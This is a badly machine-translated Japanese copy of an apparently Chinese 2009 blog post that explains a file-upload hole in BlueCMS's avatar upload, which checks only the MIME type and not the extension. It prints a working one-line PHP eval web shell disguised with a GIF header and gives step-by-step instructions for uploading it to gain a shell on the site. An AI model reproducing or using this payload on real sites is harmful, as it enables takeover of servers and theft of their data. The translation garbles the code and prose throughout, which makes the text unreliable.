bluecmsエクスプロイト·エクスプロイト、bluecms、bluecmsエクスプロイト、PHP、アップロード、ファイルの頭st0pさんのブログ

bluecmsエクスプロイト

このエントリは2009年10月7日に投稿されました

：St0p
再現するソースを示してください。http://www.st0p.org

注：申し訳ありませんが、夜に朝の髪のバージョンが、新聞のエクスプロイトの危険へのデュアルと呼ば知らされ、ちょうど公式に行くされているを見て、ああ、すぐにセキュリティパッチをリリースしました...あなたは、オンラインで行くことができますテストのない更新されたバージョン...

残念なことに、グループは私の友人は、ユーザーデータは一部が注入されることがあります変更することによると、CMSを行い、解析では、局所的に、使用することはできませんした後にインストールされている、と述べた単一引用符は、このオプションは、magic_quotes_gpc = offとエスケープされます。。。

/ common.inc.phpの行を含めあきらめる参照してください。。

  ......
  ! get_magic_quotes_gpc ( ) ) もし（！ためget_magic_quotes_gpc（））
  {
 	 deep_addslashes ( $_POST ) ; $ _POST = Deep_addslashes（$ _POST）;
 	 deep_addslashes ( $_GET ) ; $ _GET = Deep_addslashes（$ _GET）;
 	 deep_addslashes ( $_COOKIES ) ; $ _COOKIES = Deep_addslashes（$ _COOKIES）;
 	 deep_addslashes ( $_REQUEST ) ; $ _REQUEST = Deep_addslashes（$ _REQUEST）;
  }
 ......

おそらく幸運をst0p、部品、コードの分析写真をアップロードしてください、user.phpにで見つかったものを使用しています。。

  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 するrequire_once（BLUE_ROOT. 'は/ upload.class.phpを含む'）; / /コールアップロードクラス
     new upload ( ) ; $イメージ=新しいアップロード（）;
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { IF（かどうかの判断（$ _FILES ['face_pic'] ['エラー']）&& $ _FILES ['face_pic'] ['エラー'] == 0）{
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ Face_pic = $イメージ - > img_upload（$ _FILES ['face_pic']、 'face_pic'）; 
                          / /直接には接尾辞を検出しませんでした、このクラスは、SHELLを通過できるようになります
	 }

専用のファイルヘッダを検出するためにinclude / upload.class.phpを開きサフィックスを検出しません。

  ......
 クラスのアップロード{
	 = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; プライベート$ allow_image_type =配列（ '画像/ JPG'、 'image / gifの'、 'image / pngの'、 'イメージ/ pjpeg'）;
 ......
     $file , $dir = '' , $imgname = '' ) { 関数img_upload（$ファイルは、$ DIR =''、$ imgname =''）{
    	 empty ( $dir ) ) { {（（$ dir）を空の）場合
    		 BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; 。$ DIR = BLUE_ROOTデータのアップロード日付（ "YM"） "/";
    	 { する} else {
    		 BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; 。。$ DIR = BLUE_ROOTデータのアップロード$ DIR "/";
    	 }

    	 ! file_exists ( $dir ) ) { もし（！調べるfile_exists（$ DIR））{
    		 ! mkdir ( $dir ) ) { もし（！MKDIR（$ DIR））{
    			 ) ; showmsg（ 'アップロード処理は、ディレクトリの作成に失敗しました'）;
    		 }
    	 }
    	 empty ( $imgname ) ) { {（（$ imgname）が空）の場合
    		 $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; Imgname $ = $この - > create_tempname（）$この - > get_type（$ファイル['名前']）;
    	 }
    	 $dir . $imgname ; $ Imgname = $ DIR $ Imgname。
    	 ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { IF（ます。in_array（$ファイル['タイプ']は、$ this - > allow_image_type））{
              / /ただ転送するファイルのヘッダを検出し、次に我々は直接のようなシェルを構築する
    		 ) ; showmsg（ '画像の種類を許可していません'）を;
    	 }


     }

st0p.php上記の保存

A 2	GIF89aの ( $_POST [ st0p ] ) ; ?> <PHPのeval（$ _POST [st0p]）;？>

ネットワークアカウントのログイン、会員に注意してください - >私のプロフィールをし、我々は、PHPファイルを構築して選挙に新しいイメージをアップロードして、ポイントのアドレスが正常に終了し、表示、変更を確認するために、直接ライン上の写真を右クリックします。。単語のシェルは、正常にアップロードされました！

分析が完了すると、私はより多くの交流、これらのものの問題は単に、同様に普通のグループにグループを設定し、技術を議論するために一緒にのみ100人を何人かの友人に会いたい、クリーンアップ、話すことはありませんことを願ってロードされたB混沌T、落ち込んで、開いているグループは交換することです悪くなかった、話せない代わりに、プレースホルダであった、進行したい場合は、孤高の道は行くことはできません！
グループにするだけで他人から他人の議論の結果を取得する場合は、支払う、または単にスキューバダイビングに来るか、せずにするのか分からない。。。